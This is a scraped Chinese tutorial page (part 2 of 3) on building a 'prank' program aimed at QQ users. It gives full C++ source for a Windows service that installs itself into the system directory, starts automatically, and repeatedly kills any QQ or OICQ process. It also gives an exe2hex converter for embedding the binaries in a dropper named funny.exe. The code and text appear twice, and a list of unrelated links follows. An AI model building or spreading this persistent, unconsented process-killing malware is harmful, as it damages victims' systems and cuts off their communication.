亲手打造一个QQ恶作剧程序http://www.host01.com/article/InterNet/00100002/0542318402151263_2.htm
来源:互联网 发布:毕业电子相册软件 编辑:程序博客网 时间:2024/05/01 12:57
//
#include "stdafx.h"
#include "Service.h"
#include "winsvc.h"
#include <atlbase.h> //CRegKey类需要的头文件
#include <Afxtempl.h> //CArray类需要的头文件
#include <tlhelp32.h> //ToolHelp函数需要的头文件
#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif
/////////////////////////////////////////////////////////////////////////////
// The one and only application object
CWinApp theApp;
using namespace std;
SERVICE_STATUS_HANDLE ssh;
SC_HANDLE scm,svc;
SERVICE_STATUS ss;
CArray<PROCESSENTRY32,PROCESSENTRY32 &> m_PEArray;
void WINAPI ServiceMain(DWORD dwArgc, LPTSTR *lpszArgv);
void WINAPI Handler(DWORD Opcode);
void InstallService();
UINT KillQQ(LPVOID lpvoid);
int _tmain(int argc, TCHAR* argv[], TCHAR* envp[])
{
int nRetCode = 0;
// initialize MFC and print and error on failure
if (!AfxWinInit(::GetModuleHandle(NULL), NULL, ::GetCommandLine(), 0))
{
// TODO: change error code to suit your needs
cerr << _T("Fatal Error: MFC initialization failed") << endl;
nRetCode = 1;
}
else
{
SERVICE_TABLE_ENTRY ste[2];
//线程入口表
ste[0].lpServiceName="Service"; //线程名字
ste[0].lpServiceProc=ServiceMain; //线程入口地址
//可以有多个线程,最后一个必须为NULL
ste[1].lpServiceName=NULL;
ste[1].lpServiceProc=NULL;
StartServiceCtrlDispatcher(ste);
InstallService();
}
return nRetCode;
}
//安装并启动服务
void InstallService()
{
LPTSTR lpSysPath=new char[MAX_PATH];
::GetSystemDirectory(lpSysPath,MAX_PATH);
LPCTSTR lpsysfilename;
lpsysfilename=(LPCTSTR)lstrcat(lpSysPath,"//Service.exe");
scm=OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
if(scm!=NULL)
svc=CreateService(scm,"Service","Service",SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS│SERVICE_INTERACTIVE_PROCESS,SERVICE_AUTO_START,SERVICE_ERROR_IGNORE,lpsysfilename,NULL,NULL,NULL,NULL,NULL);
if(svc!=NULL)
svc=OpenService(scm,"Service",SERVICE_START);
if (svc!=NULL)
{
StartService(svc,0,NULL);
CloseServiceHandle(svc);
}
CloseServiceHandle(scm);
}
//服务的真正入口点函数
void WINAPI ServiceMain(DWORD dwArgc, LPTSTR *lpszArgv)
{
ss.dwServiceType = SERVICE_WIN32;
ss.dwCurrentState = SERVICE_START_PENDING;
ss.dwControlsAccepted = SERVICE_ACCEPT_STOP│ SERVICE_ACCEPT_PAUSE_CONTINUE;
ss.dwServiceSpecificExitCode = 0;
ss.dwWin32ExitCode = 0;
ss.dwCheckPoint = 0;
ss.dwWaitHint = 0;
ssh=RegisterServiceCtrlHandler("Service",Handler);
ss.dwCurrentState = SERVICE_RUNNING;
ss.dwCheckPoint = 0;
ss.dwWaitHint = 0;
SetServiceStatus(ssh,&ss);
AfxBeginThread(KillQQ,NULL,NULL); //开始一个工作线程实现程序功能
ss.dwCurrentState = SERVICE_RUNNING;
ss.dwCheckPoint = 0;
ss.dwWaitHint = 0;
SetServiceStatus(ssh,&ss);
}
//处理服务要求
void WINAPI Handler(DWORD Opcode)
{
switch(Opcode)
{
case SERVICE_CONTROL_STOP:
ss.dwCurrentState =SERVICE_STOPPED;
SetServiceStatus (ssh,&ss);
break;
case SERVICE_CONTROL_CONTINUE:
ss.dwCurrentState = SERVICE_RUNNING;
SetServiceStatus (ssh,&ss);
break;
case SERVICE_CONTROL_PAUSE:
ss.dwCurrentState = SERVICE_PAUSED;
SetServiceStatus (ssh,&ss);
break;
case SERVICE_CONTROL_INTERROGATE:
break;
}
SetServiceStatus (ssh,&ss);
}
//在进程列表中查找QQ程序并杀掉的线程函数
UINT KillQQ(LPVOID lParam)
{
while(1)
{
m_PEArray.RemoveAll();
HANDLE hProcessSnap=NULL;
PROCESSENTRY32 pe32;
hProcessSnap=::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
pe32.dwSize=sizeof(PROCESSENTRY32);
if(::Process32First(hProcessSnap,&pe32))
{
do
{
m_PEArray.Add(pe32);
}
while(::Process32Next(hProcessSnap,&pe32));
}
int i;
for(i=0;i<m_PEArray.GetSize();i++)
{
CString str;
str.Format("%s",m_PEArray[i].szExeFile);
if(str.Find("QQ")!=-1││str.Find("OICQ")!=-1││str.Find("qq")!=-1││str.Find("oicq")!=-1)
{
HANDLE hProcess;
DWORD ProcessID;
ProcessID=m_PEArray[i].th32ProcessID;
hProcess=::OpenProcess(PROCESS_ALL_ACCESS,FALSE,ProcessID);
::TerminateProcess(hProcess,99);
CloseHandle(hProcess);
}
}
Sleep(500);
}
return 0;
}
编译连接可以生成Service.exe程序.(后附整个工程)
现在我们已经得到了实现功能的两个程序,kernel.exe是在Win9X系统下实现功能的程序,Service.exe是Win2000/XP下实现功能的程序.现在就要将这两个文件转化成16进制代码.可以通过一个程序来实现,建立一个名为exe2hex的Win32 Console Application程序,程序代码如下:
#include <stdio.h>
#include <windows.h>
int main(int argc,char **argv)
{
HANDLE hFile;
DWORD dwSize,dwRead,dwIndex=0,i;
unsigned char *lpBuff=NULL;
__try
{
if(argc!=2)
{
printf("/nUsage: %s <File>",argv[0]);
__leave;
}
hFile=CreateFile(argv[1],GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
if(hFile==INVALID_HANDLE_VALUE)
{
printf("/nOpen file %s failed:%d",argv[1],GetLastError());
__leave;
}
dwSize=GetFileSize(hFile,NULL);
if(dwSize==INVALID_FILE_SIZE)
{
printf("/nGet file size failed:%d",GetLastError());
__leave;
}
lpBuff=(unsigned char *)malloc(dwSize);
if(!lpBuff)
{
printf("/nmalloc failed:%d",GetLastError());
__leave;
}
while(dwSize>dwIndex)
{
if(!ReadFile(hFile,&lpBuff[dwIndex],dwSize-dwIndex,&dwRead,NULL))
{
printf("/nRead file failed:%d",GetLastError());
__leave;
}
dwIndex+=dwRead;
}
for(i=0;i<dwSize;i++)
{
if((i%16)==0)
if(i==0)
printf("/"");
else
printf("/"/n/"");
printf("//x%.2X",lpBuff[i]);
}
printf("/"");
}//end of try
__finally
{
if(lpBuff) free(lpBuff);
CloseHandle(hFile);
}
return 0;
}
编译出可执行文件exe2hex.exe,执行exe2hex kernel.exe >kernel.txt将输出结果重定向到一个文本文件就得到了kernel.exe的16进制代码,同理可以得到Service.exe的16进制代码.
啊,写了这么多还真有点累了,不过还好总算要完成了,歇口气.最后我们来编写主程序funny.exe:
#include "stdafx.h"
#include "Service.h"
#include "winsvc.h"
#include <atlbase.h> //CRegKey类需要的头文件
#include <Afxtempl.h> //CArray类需要的头文件
#include <tlhelp32.h> //ToolHelp函数需要的头文件
#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif
/////////////////////////////////////////////////////////////////////////////
// The one and only application object
CWinApp theApp;
using namespace std;
SERVICE_STATUS_HANDLE ssh;
SC_HANDLE scm,svc;
SERVICE_STATUS ss;
CArray<PROCESSENTRY32,PROCESSENTRY32 &> m_PEArray;
void WINAPI ServiceMain(DWORD dwArgc, LPTSTR *lpszArgv);
void WINAPI Handler(DWORD Opcode);
void InstallService();
UINT KillQQ(LPVOID lpvoid);
int _tmain(int argc, TCHAR* argv[], TCHAR* envp[])
{
int nRetCode = 0;
// initialize MFC and print and error on failure
if (!AfxWinInit(::GetModuleHandle(NULL), NULL, ::GetCommandLine(), 0))
{
// TODO: change error code to suit your needs
cerr << _T("Fatal Error: MFC initialization failed") << endl;
nRetCode = 1;
}
else
{
SERVICE_TABLE_ENTRY ste[2];
//线程入口表
ste[0].lpServiceName="Service"; //线程名字
ste[0].lpServiceProc=ServiceMain; //线程入口地址
//可以有多个线程,最后一个必须为NULL
ste[1].lpServiceName=NULL;
ste[1].lpServiceProc=NULL;
StartServiceCtrlDispatcher(ste);
InstallService();
}
return nRetCode;
}
//安装并启动服务
void InstallService()
{
LPTSTR lpSysPath=new char[MAX_PATH];
::GetSystemDirectory(lpSysPath,MAX_PATH);
LPCTSTR lpsysfilename;
lpsysfilename=(LPCTSTR)lstrcat(lpSysPath,"//Service.exe");
scm=OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
if(scm!=NULL)
svc=CreateService(scm,"Service","Service",SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS│SERVICE_INTERACTIVE_PROCESS,SERVICE_AUTO_START,SERVICE_ERROR_IGNORE,lpsysfilename,NULL,NULL,NULL,NULL,NULL);
if(svc!=NULL)
svc=OpenService(scm,"Service",SERVICE_START);
if (svc!=NULL)
{
StartService(svc,0,NULL);
CloseServiceHandle(svc);
}
CloseServiceHandle(scm);
}
//服务的真正入口点函数
void WINAPI ServiceMain(DWORD dwArgc, LPTSTR *lpszArgv)
{
ss.dwServiceType = SERVICE_WIN32;
ss.dwCurrentState = SERVICE_START_PENDING;
ss.dwControlsAccepted = SERVICE_ACCEPT_STOP│ SERVICE_ACCEPT_PAUSE_CONTINUE;
ss.dwServiceSpecificExitCode = 0;
ss.dwWin32ExitCode = 0;
ss.dwCheckPoint = 0;
ss.dwWaitHint = 0;
ssh=RegisterServiceCtrlHandler("Service",Handler);
ss.dwCurrentState = SERVICE_RUNNING;
ss.dwCheckPoint = 0;
ss.dwWaitHint = 0;
SetServiceStatus(ssh,&ss);
AfxBeginThread(KillQQ,NULL,NULL); //开始一个工作线程实现程序功能
ss.dwCurrentState = SERVICE_RUNNING;
ss.dwCheckPoint = 0;
ss.dwWaitHint = 0;
SetServiceStatus(ssh,&ss);
}
//处理服务要求
void WINAPI Handler(DWORD Opcode)
{
switch(Opcode)
{
case SERVICE_CONTROL_STOP:
ss.dwCurrentState =SERVICE_STOPPED;
SetServiceStatus (ssh,&ss);
break;
case SERVICE_CONTROL_CONTINUE:
ss.dwCurrentState = SERVICE_RUNNING;
SetServiceStatus (ssh,&ss);
break;
case SERVICE_CONTROL_PAUSE:
ss.dwCurrentState = SERVICE_PAUSED;
SetServiceStatus (ssh,&ss);
break;
case SERVICE_CONTROL_INTERROGATE:
break;
}
SetServiceStatus (ssh,&ss);
}
//在进程列表中查找QQ程序并杀掉的线程函数
UINT KillQQ(LPVOID lParam)
{
while(1)
{
m_PEArray.RemoveAll();
HANDLE hProcessSnap=NULL;
PROCESSENTRY32 pe32;
hProcessSnap=::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
pe32.dwSize=sizeof(PROCESSENTRY32);
if(::Process32First(hProcessSnap,&pe32))
{
do
{
m_PEArray.Add(pe32);
}
while(::Process32Next(hProcessSnap,&pe32));
}
int i;
for(i=0;i<m_PEArray.GetSize();i++)
{
CString str;
str.Format("%s",m_PEArray[i].szExeFile);
if(str.Find("QQ")!=-1││str.Find("OICQ")!=-1││str.Find("qq")!=-1││str.Find("oicq")!=-1)
{
HANDLE hProcess;
DWORD ProcessID;
ProcessID=m_PEArray[i].th32ProcessID;
hProcess=::OpenProcess(PROCESS_ALL_ACCESS,FALSE,ProcessID);
::TerminateProcess(hProcess,99);
CloseHandle(hProcess);
}
}
Sleep(500);
}
return 0;
}
编译连接可以生成Service.exe程序.(后附整个工程)
现在我们已经得到了实现功能的两个程序,kernel.exe是在Win9X系统下实现功能的程序,Service.exe是Win2000/XP下实现功能的程序.现在就要将这两个文件转化成16进制代码.可以通过一个程序来实现,建立一个名为exe2hex的Win32 Console Application程序,程序代码如下:
#include <stdio.h>
#include <windows.h>
int main(int argc,char **argv)
{
HANDLE hFile;
DWORD dwSize,dwRead,dwIndex=0,i;
unsigned char *lpBuff=NULL;
__try
{
if(argc!=2)
{
printf("/nUsage: %s <File>",argv[0]);
__leave;
}
hFile=CreateFile(argv[1],GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
if(hFile==INVALID_HANDLE_VALUE)
{
printf("/nOpen file %s failed:%d",argv[1],GetLastError());
__leave;
}
dwSize=GetFileSize(hFile,NULL);
if(dwSize==INVALID_FILE_SIZE)
{
printf("/nGet file size failed:%d",GetLastError());
__leave;
}
lpBuff=(unsigned char *)malloc(dwSize);
if(!lpBuff)
{
printf("/nmalloc failed:%d",GetLastError());
__leave;
}
while(dwSize>dwIndex)
{
if(!ReadFile(hFile,&lpBuff[dwIndex],dwSize-dwIndex,&dwRead,NULL))
{
printf("/nRead file failed:%d",GetLastError());
__leave;
}
dwIndex+=dwRead;
}
for(i=0;i<dwSize;i++)
{
if((i%16)==0)
if(i==0)
printf("/"");
else
printf("/"/n/"");
printf("//x%.2X",lpBuff[i]);
}
printf("/"");
}//end of try
__finally
{
if(lpBuff) free(lpBuff);
CloseHandle(hFile);
}
return 0;
}
编译出可执行文件exe2hex.exe,执行exe2hex kernel.exe >kernel.txt将输出结果重定向到一个文本文件就得到了kernel.exe的16进制代码,同理可以得到Service.exe的16进制代码.
啊,写了这么多还真有点累了,不过还好总算要完成了,歇口气.最后我们来编写主程序funny.exe:
本文章共3页,当前在第2页 1 2 3
- 亲手打造一个QQ恶作剧程序http://www.host01.com/article/InterNet/00100002/0542318402151263_2.htm
- 亲手打造一个QQ恶作剧程序
- UNIX下的Socket编程2008-08-24 13:10原文链接:http://www.host01.com/article/server/00070002/0621409103916080.htm
- 程序随机启动的新方法 http://www.zaoxue.com/article/tech-14823.htm
- http://www.jb51.net/article/3357.htm
- http://www.jb51.net/article/51052.htm
- http://www.jb51.net/article/41274.htm
- http://www.jb51.net/article/37855.htm
- http://www.jb51.net/article/32651.htm
- http://www.jb51.net/article/37462.htm
- http://www.jb51.net/article/53271.htm
- http://www.jb51.net/article/84149.htm
- 转http://www.anyliz.com/blog/article/Software/favorites-software-official-download-url.htm
- 关于0电阻的应用--来源:http://www.eepw.com.cn/article/56676.htm
- 转载一个不错的js弹出div效果http://www.jb51.net/article/14885.htm
- http://www.vantrontech.com/index.htm
- http://www.askguoyu.com/cm/cvs1.htm
- http://www.bjsdc.com/vpn/index.htm
- C#导出Excel汇总
- 【格式转换程序软件集】---[A2B]---集中收集-不断更新[2008-3-29] 软件 软件 杭州志彬电脑维修网
- Anthem.NET
- 所有论坛
- Ajax.NET Professional (AjaxPro)
- 亲手打造一个QQ恶作剧程序http://www.host01.com/article/InterNet/00100002/0542318402151263_2.htm
- Spring中的时间调度,定时任务
- xxx2xxx转换工具邪恶八进制收集整理上传专用主题(不断更新)https://forum.eviloctal.com/viewthread.php?tid=14426
- Lucene.Net
- 文档类型定义DTD
- NLucene
- Code
- Code
- vb使用open方法读写文件
